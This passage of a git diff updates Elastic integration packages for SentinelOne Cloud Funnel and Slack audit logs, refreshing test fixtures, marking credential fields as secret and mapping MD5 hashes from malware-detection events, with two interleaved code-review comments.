ntinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"6cbce4a295c163791b60fc23d285e6d84f28ee4c\",\"src.process.isStoryline™Root\":false,\"cmdS
cript.applicationName\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.17763.1\",\"src.process.parent.image.path\":\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"src.process.pid\":5912,\"tgt.file.isSigned\":\"signed\",\"sca:ingestTime\":1666684063,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';\",\"src.process.publisher\":\"MICROSOFTWINDOWS\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE_168\",\"src.process.parent.cmdline\":\"C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2\",\"cmdScript.content\":\"$global:?\",\"src.process.image.path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"src.process.tgtFileModificationCount\":4,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":0,\"cmdScript.sha256\":\"feb60de98632d9f666e16e89bd1c99174801c761115d4a9f52f05ef41e397d2d\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1666684041917,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Standard\",\"src.process.activeContent.id\":\"3EFA3EFA3EFA3EFA\",\"src.process.displayName\":\"WindowsPowerShell\",\"src.process.activeContent.path\":\"\\\\Unknowndevice\\\\Unknownfile\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.uid\":\"230B188E26085676\",\"src.process.parent.image.md5\":\"47dd94d79d9bac54a2c3a1cf502770c6\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"230B188E26085676\",\"cmdScript.originalSize\":1
8,\"agent.version\":\"22.1.4.10010\",\"src.process.parent.uid\":\"8608188E26085676\",\"src.process.parent.image.sha256\":\"046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.publisher\":\"MICROSOFTWINDOWS\",\"src.process.parent.startTime\":1666683971590,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"trace.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE\",\"src.process.name\":\"powershell.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.activeContent.hash\":\"a8ae2c841e3f0f39d494a45370815a90cf00421e\",\"src.process.image.sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"src.process.indicatorGeneralCount\":49,\"src.process.crossProcessOutOfStoryline™Count\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"9CB6AC4F10C34F5BB0A2788760E870F5\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"NTAUTHORITY\\\\SYSTEM\",\"event.type\":\"CommandScript\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":6008}", "type": [ @@ -53,9 +53,11 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, 
@@ -64,12 +66,28 @@ }, "log": { "file": { - "path": "https://elastic-package-sentinel-one-bucket-47039.s3.us-east-1.amazonaws.com/command_script.log" + "path": "https://elastic-package-sentinel-one-bucket-53400.s3.us-east-1.amazonaws.com/command_script.log" }, "offset": 0 }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", + "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -77,7 +95,13 @@ }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", + "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -239,7 +263,7 @@ "is_signed": "signed" } }, - "timestamp": "2023-01-01T10:47:24.180Z", + "timestamp": "2024-01-01T10:47:24.180Z", "trace_id": "01GG71RXEEHZQFY6XZ1WGS2BAE", "type": "CommandScript" } @@ -249,5 +273,9 @@ "preserve_original_event", "forwarded", "sentinel_one_cloud_funnel-event" - ] -} + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } +} \ No newline at end of file 
diff --git a/packages/sentinel_one_cloud_funnel/docs/README.md b/packages/sentinel_one_cloud_funnel/docs/README.md index a03ef36155e..addd1fe62b9 100644 --- a/packages/sentinel_one_cloud_funnel/docs/README.md +++ b/packages/sentinel_one_cloud_funnel/docs/README.md @@ -152,17 +152,17 @@ An example event for `event` looks as following: { "@timestamp": "2022-10-25T07:47:24.180Z", "agent": { - "ephemeral_id": "26afb86c-4349-4dc3-8efa-fe82afd55bcf", - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "ephemeral_id": "82352929-5f46-412e-a787-c016dde956f9", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "aws": { "s3": { "bucket": { - "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-47039", - "name": "elastic-package-sentinel-one-bucket-47039" + "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-53400", + "name": "elastic-package-sentinel-one-bucket-53400" }, "object": { "key": "command_script.log" @@ -181,9 +181,9 @@ An example event for `event` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", 
@@ -192,7 +192,7 @@ An example event for `event` looks as following: ], "dataset": "sentinel_one_cloud_funnel.event", "id": "01GG71RXEEHZQFY6XZ1WGS2BAE_168", - "ingested": "2023-11-02T13:59:39Z", + "ingested": "2024-04-04T22:17:38Z", "kind": "event", "original": "{\"timestamp\":\"10:47:24.180\",\"src.process.parent.isStoryline™Root\":false,\"event.category\":\"command_script\",\"src.process.parent.image.sha1\":\"134fd2ad04cf59b0c10596230da5daf6fc711bd1\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"MicrosoftCompatibilityTelemetry\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":0,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":284,\"src.process.parent.name\":\"CompatTelRunner.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"CLI\",\"sca:atlantisIngestTime\":1666684057507,\"src.process.image.md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"src.process.indicatorReconnaissanceCount\":8,\"src.process.Storyline™.id\":\"87EE3C19E0250305\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"cmdScript.isComplete\":true,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"SCRIPTS\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.Storyline™.id\":\"87EE3C19E0250305\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1666684044180,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"6cbce4a295c163791b60fc23d285e6d84f28e
e4c\",\"src.process.isStoryline™Root\":false,\"cmdScript.applicationName\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.17763.1\",\"src.process.parent.image.path\":\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"src.process.pid\":5912,\"tgt.file.isSigned\":\"signed\",\"sca:ingestTime\":1666684063,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';\",\"src.process.publisher\":\"MICROSOFTWINDOWS\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE_168\",\"src.process.parent.cmdline\":\"C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2\",\"cmdScript.content\":\"$global:?\",\"src.process.image.path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"src.process.tgtFileModificationCount\":4,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":0,\"cmdScript.sha256\":\"feb60de98632d9f666e16e89bd1c99174801c761115d4a9f52f05ef41e397d2d\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1666684041917,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Standard\",\"src.process.activeContent.id\":\"3EFA3EFA3EFA3EFA\",\"src.process.displayName\":\"WindowsPowerShell\",\"src.process.activeContent.path\":\"\\\\Unknowndevice\\\\Unknownfile\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.uid\":\"230B188E26085676\",\"src.process.parent.image.md5\":\"47dd94d79d9bac54a2c3a1cf502770c6\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\
":\"230B188E26085676\",\"cmdScript.originalSize\":18,\"agent.version\":\"22.1.4.10010\",\"src.process.parent.uid\":\"8608188E26085676\",\"src.process.parent.image.sha256\":\"046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.publisher\":\"MICROSOFTWINDOWS\",\"src.process.parent.startTime\":1666683971590,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"trace.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE\",\"src.process.name\":\"powershell.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.activeContent.hash\":\"a8ae2c841e3f0f39d494a45370815a90cf00421e\",\"src.process.image.sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"src.process.indicatorGeneralCount\":49,\"src.process.crossProcessOutOfStoryline™Count\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"9CB6AC4F10C34F5BB0A2788760E870F5\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"NTAUTHORITY\\\\SYSTEM\",\"event.type\":\"CommandScript\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":6008}", "type": [ @@ -204,9 +204,11 @@ An example event for `event` looks as following: }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, 
@@ -215,12 +217,28 @@ An example event for `event` looks as following: }, "log": { "file": { - "path": "https://elastic-package-sentinel-one-bucket-47039.s3.us-east-1.amazonaws.com/command_script.log" + "path": "https://elastic-package-sentinel-one-bucket-53400.s3.us-east-1.amazonaws.com/command_script.log" }, "offset": 0 }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", + "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -228,7 +246,13 @@ An example event for `event` looks as following: }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", + "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -390,7 +414,7 @@ An example event for `event` looks as following: "is_signed": "signed" } }, - "timestamp": "2023-01-01T10:47:24.180Z", + "timestamp": "2024-01-01T10:47:24.180Z", "trace_id": "01GG71RXEEHZQFY6XZ1WGS2BAE", "type": "CommandScript" } 
@@ -400,9 +424,12 @@ An example event for `event` looks as following:
 "preserve_original_event",
 "forwarded",
 "sentinel_one_cloud_funnel-event"
- ]
+ ],
+ "user": {
+ "domain": "NTAUTHORITY",
+ "name": "SYSTEM"
+ }
 }
-
 ```
 
 **Exported fields**
@@ -420,6 +447,7 @@ An example event for `event` looks as following:
 | event.module | Event module. | constant_keyword |
 | input.type | Type of filebeat input. | keyword |
 | log.offset | Log offset. | long |
+| powershell.file.script_block_text | Text of the executed script block. | text |
 | sentinel_one_cloud_funnel.event.account_id | SentinelOne Account ID. | keyword |
 | sentinel_one_cloud_funnel.event.agent.uuid | Agent Unique ID. | keyword |
 | sentinel_one_cloud_funnel.event.agent.version | Version of SentinelOne Agent. | keyword |
diff --git a/packages/sentinel_one_cloud_funnel/manifest.yml b/packages/sentinel_one_cloud_funnel/manifest.yml
index 34ea19fc52f..bf4cf05e47c 100644
--- a/packages/sentinel_one_cloud_funnel/manifest.yml
+++ b/packages/sentinel_one_cloud_funnel/manifest.yml
@@ -1,13 +1,13 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: sentinel_one_cloud_funnel
 title: SentinelOne Cloud Funnel
-version: "0.10.1"
+version: "0.14.0"
 description: Collect logs from SentinelOne Cloud Funnel with Elastic Agent.
 type: integration
 categories: ["security", "edr_xdr"]
 conditions:
 kibana:
- version: ^8.11.0
+ version: ^8.10.1
 elastic:
 subscription: basic
 screenshots:
@@ -78,6 +78,7 @@ policy_templates:
 required: false
 show_user: true
 description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file.
+ secret: true
 - name: secret_access_key
 type: password
 title: Secret Access Key
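Review bot: In the `@@ -1,13 +1,13 @@` manifest hunk the Kibana constraint moves down from `^8.11.0` to `^8.10.1` in the same release that adds `secret: true` to the credential variables, which looks inverted: the slack and snyk manifests in this diff raise their constraint to `^8.12.0` alongside the identical "Set sensitive values as secret" change, and as far as I recall 8.12 is the first Kibana that stores `secret: true` variables in secure storage. On an 8.10.x/8.11.x Kibana the attribute would presumably be ignored or rejected at package install, so either way the lower bound does not match what the package now declares. Unless the downgrade is deliberate, the line should read `version: ^8.12.0`; the package changelog that would explain the choice is outside this chunk.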
@@ -85,13 +86,15 @@ policy_templates:
 required: false
 show_user: true
 description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file.
+ secret: true
 - name: session_token
- type: text
+ type: password
 title: Session Token
 multi: false
 required: false
 show_user: true
 description: Required when using temporary security credentials.
+ secret: true
 - name: shared_credential_file
 type: text
 title: Shared Credential File
@@ -176,6 +179,7 @@ policy_templates:
 multi: false
 required: false
 show_user: true
+ secret: true
 - name: service_account_file
 type: text
 title: "JSON Credentials file path"
diff --git a/packages/slack/changelog.yml b/packages/slack/changelog.yml
index cb3d0343af0..67324febc33 100644
--- a/packages/slack/changelog.yml
+++ b/packages/slack/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.19.0"
+ changes:
+ - description: Map md5 hash detail for files.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9417
+- version: "1.18.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
 - version: "1.17.1"
 changes:
 - description: Changed owners
diff --git a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log
index 194b56eda8f..79c16cdff4b 100644
--- a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log
+++ b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log
@@ -2,4 +2,5 @@ {"id":"bdcb13e3-28a3-41f0-9ace-a20952def3a0","date_create":1566215192,"action":"user_created","actor":{"type":"user","user":{"id":"e65b0f5c","name":"roy","email":"aaron@demo.com"}},"entity":{"type":"user","user":{"id":"asdfasdf","name":"Joe Bob","email":"jbob@example.com","team":"T234SAH2"}},"context":{"location":{"type":"workspace","id":"e65b11aa","name":"Docker","domain":"Docker"},"ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0","ip_address":"81.2.69.143"}} {"action":"file_downloaded","actor":{"type":"user","user":{"email":"user.mcuser@abcd.co","id":"2f52269c-4f38-4f08-b56d-c2b968681dbd","name":"User McUser","team":"user-team"}},"context":{"ip_address":"81.2.69.144","location":{"domain":"domain.tld","id":"eedd1a7d-1a92-418d-8b01-51a4c809d0fb","name":"The Place","type":"workspace"},"session_id":913888259765,"ua":"com.tinyspeck.chatlyio/23.04.40 (iPhone; iOS 1.4.1; Scale/3.00)"},"date_create":1683836275,"details":{"url_private":"https://example.com/"},"entity":{"file":{"filetype":"image/png","id":"7edc4c42-f925-47af-979a-22c10e1fefed","name":"image.png","title":"image.png"},"type":"file"},"id":"2db28060-1659-4b27-ad55-fdba12e3a7b1"} {"id":"16f5fb41-c67c-4cf5-a5c4-d90cb58dd5f9","date_create":1673631531,"action":"anomaly","actor":{"type":"user","user":{"id":"e65b0f5c","name":"roy","email":"aaron@demo.com"}},"entity":{"type":"user","user":{"id":"asdfasdf","name":"Joe Bob","email":"jbob@example.com","team":"T234SAH2"}},"context":{"location":{"type":"workspace","id":"e65b11aa","name":"Docker","domain":"Docker"},"ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0","ip_address":"81.2.69.143"},"details":{"action_timestamp":1673631621862,"location":"England, GB","previous_ip_address":"175.16.199.64","previous_ua":"","reason":["asn","ip_address"]}} -{"action":"anomaly","actor":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John 
Doe","team":"Z0937DXQX"}},"context":{"ip_address":"192.168.220.224","location":{"domain":"example","id":"Z0937DXQX","name":"Acme","type":"workspace"},"session_id":9982493323637,"ua":"com.tinyspeck.chatlyio/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)"},"date_create":1689249764,"details":{"action_timestamp":1689249716345113,"location":"Tokyo, JP","previous_ip_address":"192.168.79.87","previous_ua":"com.tinyspeck.chatlyio.NotificationService/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)","reason":["asn","ip_address"]},"entity":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"id":"abc8e17e-c081-4b82-a515-4c54674e3de4"} \ No newline at end of file +{"action":"anomaly","actor":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"context":{"ip_address":"192.168.220.224","location":{"domain":"example","id":"Z0937DXQX","name":"Acme","type":"workspace"},"session_id":9982493323637,"ua":"com.tinyspeck.chatlyio/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)"},"date_create":1689249764,"details":{"action_timestamp":1689249716345113,"location":"Tokyo, JP","previous_ip_address":"192.168.79.87","previous_ua":"com.tinyspeck.chatlyio.NotificationService/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)","reason":["asn","ip_address"]},"entity":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"id":"abc8e17e-c081-4b82-a515-4c54674e3de4"} +{"action":"file_malicious_content_detected","actor":{"type":"user","user":{"email":"XXXXXXX@elastic.co","id":"U01MF9XXXX","name":"XXXXXx","team":"T0CUXXXXX"}},"context":{"ip_address":"81.2.69.143","location":{"domain":"elastic","id":"XXXXXX","name":"Elastic","type":"workspace"},"session_id":5458207163185,"ua":"Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation 
Servicing_Channel/SAC Sonic Slack_SSB/4.36.140"},"date_create":1709627947,"details":{"md5_hash":"7e2b2819a67bb11b0ca280c1d0646f42"},"entity":{"file":{"filetype":"","id":"F06XXXXXXX","name":"mimi.zip","title":""},"type":"file"},"id":"bbcf1d28-4012-4771-8179-8a59c6f2bffa"} diff --git a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 36c8cb37895..59c7692888a 100644 --- a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json 
@@ -406,6 +406,98 @@ "version": "16.5.1" } } + }, + { + "@timestamp": "2024-03-05T08:39:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "file_malicious_content_detected", + "category": [ + "file", + "malware" + ], + "id": "bbcf1d28-4012-4771-8179-8a59c6f2bffa", + "kind": "event", + "original": "{\"action\":\"file_malicious_content_detected\",\"actor\":{\"type\":\"user\",\"user\":{\"email\":\"XXXXXXX@elastic.co\",\"id\":\"U01MF9XXXX\",\"name\":\"XXXXXx\",\"team\":\"T0CUXXXXX\"}},\"context\":{\"ip_address\":\"81.2.69.143\",\"location\":{\"domain\":\"elastic\",\"id\":\"XXXXXX\",\"name\":\"Elastic\",\"type\":\"workspace\"},\"session_id\":5458207163185,\"ua\":\"Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation Servicing_Channel/SAC Sonic Slack_SSB/4.36.140\"},\"date_create\":1709627947,\"details\":{\"md5_hash\":\"7e2b2819a67bb11b0ca280c1d0646f42\"},\"entity\":{\"file\":{\"filetype\":\"\",\"id\":\"F06XXXXXXX\",\"name\":\"mimi.zip\",\"title\":\"\"},\"type\":\"file\"},\"id\":\"bbcf1d28-4012-4771-8179-8a59c6f2bffa\"}", + "type": [ + "info" + ] + }, + "file": { + "hash": { + "md5": "7e2b2819a67bb11b0ca280c1d0646f42" + } + }, + "related": { + "hash": [ + "7e2b2819a67bb11b0ca280c1d0646f42" + ], + "ip": [ + "81.2.69.143" + ], + "user": [ + "U01MF9XXXX", + "XXXXXXX@elastic.co" + ] + }, + "slack": { + "audit": { + "context": { + "domain": "elastic", + "id": "XXXXXX", + "name": "Elastic", + "session_id": "5458207163185", + "type": "workspace" + }, + "details": { + "md5": "7e2b2819a67bb11b0ca280c1d0646f42" + }, + "entity": { + "entity_type": "file", + "id": "F06XXXXXXX", + "name": "mimi.zip" + } + } + }, + "source": { + "address": "81.2.69.143", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + 
"region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "XXXXXXX@elastic.co", + "full_name": "XXXXXx", + "id": "U01MF9XXXX" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Slack Desktop Client", + "original": "Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation Servicing_Channel/SAC Sonic Slack_SSB/4.36.140", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "4.36.140" + } } ] } \ No newline at end of file diff --git a/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index ea50001a538..5a3a649d99e 100644 --- a/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -140,6 +140,20 @@ processors: field: json.details.reason target_field: slack.audit.details.reason ignore_missing: true + - rename: + field: json.details.md5_hash + target_field: slack.audit.details.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{slack.audit.details.md5}}' + allow_duplicates: false + if: ctx.slack?.audit?.details?.md5 != null + - set: + field: file.hash.md5 + copy_from: slack.audit.details.md5 + ignore_empty_value: true + if: ctx.slack?.audit?.entity?.entity_type == "file" - script: if: ctx.json?.details?.action_timestamp != null && ctx.json.details.action_timestamp > 1e13 description: Parse action_timestamp as microseconds since unix epoch. diff --git a/packages/slack/data_stream/audit/fields/ecs.yml b/packages/slack/data_stream/audit/fields/ecs.yml index 75e26d1c53d..f7210a05058 100644 --- a/packages/slack/data_stream/audit/fields/ecs.yml 
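Review bot: The new `set` for `file.hash.md5` in the `default.yml` hunk guards only on `ctx.slack?.audit?.entity?.entity_type == "file"`, so for every file event that carries no `md5_hash` detail (the `file_downloaded` fixture, for one) it relies on `ignore_empty_value: true` quietly skipping a missing `copy_from` source, while the `append` to `related.hash` just above spells the same guard out explicitly. Aligning the two, `if: ctx.slack?.audit?.entity?.entity_type == "file" && ctx.slack?.audit?.details?.md5 != null`, makes the intent readable and should not change the output. A short comment above the new `rename` would also help analysts who pivot on `related.hash`: `# Slack only exposes an MD5 for file_malicious_content_detected; no SHA-1/SHA-256 is available, so treat matches as a weak indicator.` Whether `slack.audit.entity.entity_type` is populated before this processor runs depends on earlier steps of the pipeline that are outside the hunk.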
+++ b/packages/slack/data_stream/audit/fields/ecs.yml @@ -16,6 +16,8 @@ external: ecs - name: event.original external: ecs +- name: file.hash.md5 + external: ecs - name: related.ip external: ecs - name: related.user @@ -44,6 +46,8 @@ external: ecs - name: source.ip external: ecs +- name: related.hash + external: ecs - name: tags external: ecs - name: user.email diff --git a/packages/slack/data_stream/audit/fields/fields.yml b/packages/slack/data_stream/audit/fields/fields.yml index b6d5965310e..52c904b9102 100644 --- a/packages/slack/data_stream/audit/fields/fields.yml +++ b/packages/slack/data_stream/audit/fields/fields.yml @@ -34,6 +34,11 @@ description: > The location the activity occured in when event.action is anomaly + - name: details.md5 + type: keyword + description: > + The md5 hash of a file associated with a `file_malicious_content_detected` event. + - name: details.previous_ip_address type: ip description: > diff --git a/packages/slack/data_stream/audit/manifest.yml b/packages/slack/data_stream/audit/manifest.yml index a4e8fbed144..4be37fd9861 100644 --- a/packages/slack/data_stream/audit/manifest.yml +++ b/packages/slack/data_stream/audit/manifest.yml @@ -10,6 +10,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/slack/docs/README.md b/packages/slack/docs/README.md index 4b3ed0365e8..d781a6250fd 100644 --- a/packages/slack/docs/README.md +++ 